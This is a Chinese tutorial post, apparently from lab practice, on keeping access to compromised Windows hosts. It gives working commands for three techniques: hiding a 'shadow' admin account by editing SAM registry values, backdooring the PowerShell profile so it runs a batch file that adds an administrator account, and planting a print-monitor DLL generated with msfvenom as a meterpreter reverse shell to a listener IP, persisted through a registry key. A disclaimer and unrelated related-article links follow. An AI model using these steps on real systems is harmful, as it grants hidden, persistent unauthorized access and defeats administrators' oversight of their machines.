Windows权限维持之建立影子账号、powershell配置文件后门、Monitor权限维持
文中主要讲解Windows权限维持中的小技巧,通过了解掌握建立影子账号、powershell配置后门、Monitor权限维持等方式,更快知晓权限维持作用。本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。
建立影子账户
原理:
影子账户主要是利用在权限维持上,通过先建立带$符号的账户,然后利用注册表修改里面的值,使得管理员无法通过cmd及计算机管理等地方查看攻击者所创建的账户,从而实现权限维持。
漏洞复现:
当我们在服务器上创建一个带$符号的账户,常规的cmd是无法看到的。
从图上是无法看到这个long账户的,我们只能通过计算机管理或者控制面板的用户管理里面才能看到
那我们同样可以将这些账户进行隐藏,从而让管理员无法发现,达到影子账号的效果:
通过注册表的修改
HEKY_LOCAL_MACHINE\SAM\SAM\Domains\Account\User
regedit
这个位置需要加权限,否则无法继续查看:
在注册表的这个位置,将1F4下F项的值复制到3ea下F项里面,进行替换,
然后在这之前创建带符号long和3ea的值进行导出;删除之前创建的带符号long账号;
从这里和计算机管理里面查看已经没有long这个账户。
但我们可以使用远程登陆来测试账号是否存在,通过测试发现可以正常登陆:
影子账户就创建成功了,这个时候就只有注册表能够查看到long$这个账户:
我们只需将administrators组的权限取消即可:
powershell配置文件后门
原理:
主要powershell配置文件也是一个powershell脚本,那我们可以利用这一点,对这个脚本文件写入自定义的语句,从而实现权限维持。
漏洞复现:
首先查看当前是否存在配置文件:
echo $profile
Test-path $profile
如果存在,那么再查看这个文件的状态,如果返回是false,则需要重新创建一个:
New-Item -Path $profile -Type File –Force
再创建一个bat文件,将创建账户写入到这个bat文件中,实现权限维持:
bat内容:
net user longwa 123456 /add & net localgroup administrators longwa /add
将这个bat文件的内容,写入配置文件中:
$string = 'Start-Process "C:\long.bat"'
$string | Out-File -FilePath $profile -Append
more $profile
最后我们只需要重新打开powershell,就会成功创建账户:
Monitor 权限维持
项目地址:
https://github.com/Al1ex/Monitor
原理:
主要通过此项目实现一个白加黑的方式,此项目为白,我们创建的dll文件为黑,再通过注册表建立值,从而实现我们持续化的权限维持:
漏洞复现:
首先在msf上生成dll文件:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.45.135 LPORT=12345 -f dll > test.dll
开启监听:
将Monitor及dll文件都放入目标主机的system32目录下:
注:这里dll文件名是因为直接拿的项目编译好的exe文件使用,所以需与源码里面写的名称一致,如自行编译,那么文件名称可更改。
在system32目录下执行Monitor.exe,成功反弹shell:
持久化权限维持:
修改注册表
reg add "hklm\system\currentcontrolset\control\print\monitors\Pentestlab" /v "Driver" /d "test.dll" /t REG_SZ
regedit
这命令的意思就是在注册表的这个位置,建立一个项,项中创建一个字符串值,数值名称为Driver。数值数据为test.dll
每次当这个服务器重启的时候,就会生成反弹shell:实现持久化权限维持效果:
Windows权限维持之建立影子账号、powershell配置文件后门、Monitor权限维持相关推荐
- Linux--账号和权限管理(用户账号和组账号,用户账号和组帐号管理,文件和目录的权限和归属)
文章目录 前言 一.用户账号和组账号 1.1用户账号 1.2组账号 1.3UID号和GID号 1.4用户账号文件 1.4.1用户账号文件/etc/passwd 1.4.2用户账号文件/etc/shad ...
- vsftp建立虚拟用户不同目录分配不同权限操作步骤详解
这篇文章主要介绍了vsftp建立虚拟用户不同目录分配不同权限操作步骤详解,大家参考设置自己的FTP服务器吧vsftpd服务器同时支持匿名用户.本地用户和虚拟用户三类用户账号,使用虚拟用户账号可以提供集 ...
- 如何通过Windows Server 2008 R2建立NFS存储
如何通过Windows Server 2008 R2建立NFS存储 在我们日常工作的某些实验中,会需要使用存储服务器.而硬件存储成本高,如StarWind之类的iSCSI软存储解决方案需要单独下载服务 ...
- linux主机账户权限,【干货】linux账号和权限管理
Linux是一个多用户,多任务的服务器操作系统 用户角色:超级用户,普通用户,程序用户 一.管理用户和组账户 1,linux用户和组账户概述 用户账户: 超级用户(0) root有至高无上的权限,在进 ...
- 配置多个git账号_在Windows下配置多个git账号
本文记录了在Windows下配置两个github账号的过程. 1. 生成并部署SSH key 安装好Git客户端后,打开git bash,输入以下命令生成user1的SSH Key: ssh-keyg ...
- 小程序-微信账号绑定多个开发者权限
我的疑问? 便于理解,暂订我的微信号为 l777 公司微信号(l888). 刚开始学习时,依据官方教程申请了个人小程序账号(l777),跟着教程瞎捣鼓一阵子后准备实际做项目,公司准备立项开发小程 ...
- JAVA前端修改密码,Java Web版SVN 配置管理工具 2.0 (远道建立仓库,修改密码,设置权限,支持apache等)...
Java Web版SVN 配置管理工具 2.0 (远程建立仓库,修改密码,设置权限,支持apache等) 3.0开始,已经迁移到google code,这里停止下载.http://code.googl ...
- Windows Storage Server 2012建立iSCSI虚拟磁盘存储
Windows Storage Server 2012建立iSCSI虚拟磁盘存储 以前做群集POC验证测试时,一直习惯使用Openfiler或FreeNAS提供共享存储.这两天正在搭建Hyper-V ...
- linux帝国cms建立目录不成功,帝国网站迁移建立目录不成功!请检查目录权限帝国CMS问题解决办法...
帝国cms后台新建栏目如题提示,第一想到的就是没有权限创建文件夹,但检查过栏目取名的目录是有权限去创建的,为什么系统还会这样提示呢? 这个时候要再去检查下/d/文件夹是否可写,创建栏目文件夹也将会在/ ...
最新文章
- 毛慧昀:决策树实现对鸢尾花数据集的分类
- SSH隧道 / SSH穿透
- python 列表输入sql_SQL查询中的Python列表作为参数
- DNS智能解析的另类使用 让搜索引擎更快更好的收录您的网站
- jquery插件---自动补全类插件
- jsp EL表达式比较两个字符串
- 二叉树的中序遍历_Go 刷 leetcode从前序与中序遍历序列构造二叉树
- 前端小知识点(3):JavaScript 单线程
- day15 java接口在开发中的作用
- 解决VS中注释乱码的问题
- Python单下划线与双下划线
- NLP中的预训练方法总结 word2vec、ELMO、GPT、BERT、XLNET
- Hadoop环境搭建 MYSQL环境配置
- 格拉布斯法—异常值判断(异常值)
- java math.min_Java Math.min() 方法
- Hyperopt 超参数调优
- 联想笔记本windows10设备管理器找不到蓝牙
- LG5200 「USACO2019JAN」Sleepy Cow Sorting 树状数组
- boost::string_algo库详解
- 5G网下通过网络编码增强转发策略的NDN物联网内容分发模型